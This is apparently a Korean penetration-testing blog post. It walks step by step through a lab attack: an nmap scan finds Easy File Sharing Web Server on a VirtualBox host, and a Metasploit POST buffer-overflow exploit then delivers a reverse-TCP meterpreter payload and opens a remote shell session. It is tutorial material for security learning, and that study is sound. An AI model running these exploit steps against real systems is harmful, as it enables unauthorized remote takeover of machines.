| | at : |


Archive

[MAD-METASPLOIT] 0x20 - Remote Exploit 하훌 rwxr-xr-x 0 8/07/2017



[MAD-METASPLOIT] 0x20 - Remote Exploit

Permission rw-r--r--
Author 하훌
Date and Time 8/07/2017
Label
License 크리에이티브 커먼즈 라이선스









HAHWUL auxiliary(vnc_login) > db_nmap -PN 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:17 KST
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00072s latency).
[*] Nmap: Not shown: 983 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 80/tcp    open  http
[*] Nmap: 135/tcp   open  msrpc
[*] Nmap: 139/tcp   open  netbios-ssn
[*] Nmap: 443/tcp   open  https
[*] Nmap: 445/tcp   open  microsoft-ds
[*] Nmap: 554/tcp   open  rtsp
[*] Nmap: 2869/tcp  open  icslap
[*] Nmap: 5357/tcp  open  wsdapi
[*] Nmap: 5500/tcp  open  hotline
[*] Nmap: 5800/tcp  open  vnc-http
[*] Nmap: 5900/tcp  open  vnc
..snip..

nmap 결과 중 80(일반적인 웹) 포트에 대해 체크가 필요해보입니다.

HAHWUL > services 

Services
========

host            port   proto  name          state     info
----            ----   -----  ----          -----     ----
192.168.56.101  23     tcp    telnet        filtered
192.168.56.101  80     tcp    http          open    
192.168.56.101  135    tcp    msrpc         open    
192.168.56.101  137    udp    netbios       open      HAHWUL:<00>:U :WORKGROUP:<00>:G :HAHWUL:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U : __MSBROWSE__ :<01>:G :08:00:27:69:14:ff
192.168.56.101  139    tcp    netbios-ssn   open    
192.168.56.101  443    tcp    https         open    
192.168.56.101  445    tcp    microsoft-ds  open    
192.168.56.101  554    tcp    rtsp          open    
192.168.56.101  2869   tcp    icslap        open    
192.168.56.101  5357   tcp    wsdapi        open    
192.168.56.101  5500   tcp    hotline       open    
192.168.56.101  5800   tcp    vnc-http      open    
192.168.56.101  5900   tcp    vnc           open      VNC protocol version [3, 4].8
192.168.56.101  10243  tcp    unknown       open    
192.168.56.101  49152  tcp    unknown       open    
192.168.56.101  49153  tcp    unknown       open    
192.168.56.101  49154  tcp    unknown       open    
192.168.56.101  49155  tcp    unknown       open    
192.168.56.101  49156  tcp    unknown       open    

NSE를 활용해서, 좀 더 자세하게 정보를 얻어보니..

HAHWUL > db_nmap --script=default -p 80 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:19 KST
[*] Nmap: Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
[*] Nmap: NSE Timing: About 99.07% done; ETC: 15:20 (0:00:00 remaining)
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00051s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 80/tcp open  http
[*] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server
[*] Nmap: MAC Address: 08:00:27:69:14:FF (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds

Easy file Sharing Web server를 사용하고 있네요. 해당 서버는 공개 취약점이 어느정도 존재하는 서버이고, 관련해선 검색해보시면 많이 나올거라 생각됩니다.

바로 Metasploit을 통해 찾아봅니다.

HAHWUL > search easyfilesharing

Matching Modules
================

   Name                                       Disclosure Date  Rank     Description
   ----                                       ---------------  ----     -----------
   exploit/windows/ftp/easyfilesharing_pass   2006-07-31       average  Easy File Sharing FTP Server 2.0 PASS Overflow
   exploit/windows/http/easyfilesharing_post  2017-06-12       normal   Easy File Sharing HTTP Server 7.2 POST Buffer Overflow
   exploit/windows/http/easyfilesharing_seh   2015-12-02       normal   Easy File Sharing HTTP Server 7.2 SEH Overflow


현재까지 기준으론 3개가 나오네요. 셋다 Overflow 취약점으로 원격에서 쉘 획득이 가능하죠.
맘에드는 것 하나를 골라준 후..

HAHWUL > use exploit/windows/http/easyfilesharing_post 
HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Easy File Sharing 7.2 HTTP

세팅을 시작합니다.

HAHWUL exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
HAHWUL exploit(easyfilesharing_post) > set LHOST  192.168.56.101
LHOST =>  192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set LPORT 4646
HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.101   yes       The target address
   RPORT  80               yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST      192.168.56.100     yes       The listen address
   LPORT     4646             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Easy File Sharing 7.2 HTTP

Exploit 을 하게되면..

HAHWUL exploit(easyfilesharing_post) > exploit -z

[*] Started reverse TCP handler on  192.168.56.100:4646
[*] Sending stage (956991 bytes) to  192.168.56.101
[*] Meterpreter session 1 opened ( 192.168.56.100:4646 ->  192.168.56.101:38258) at 2017-08-07 15:24:33 +0900
[*] Session 1 created in the background.
HAHWUL exploit(easyfilesharing_post) > sessions -l

Active sessions
===============

  Id  Type                     Information                         Connection
  --  ----                     -----------                         ----------
  1   meterpreter x86/windows  HAHWUL\Virtualbox @ HAHWUL   192.168.56.100:4646 ->  192.168.56.101:38258 (192.168.56.101)


meterpreter shell이 sessions 로 들어왔습니다. 정상적으로 공격에 성공한거지요.

HAHWUL exploit(easyfilesharing_post) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 
meterpreter > 


이러한 형태로 Remote Exploit이 가능합니다.

Reference

https://www.exploit-db.com/exploits/39661/

Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM






Recent Post

0 개의 댓글:

댓글 쓰기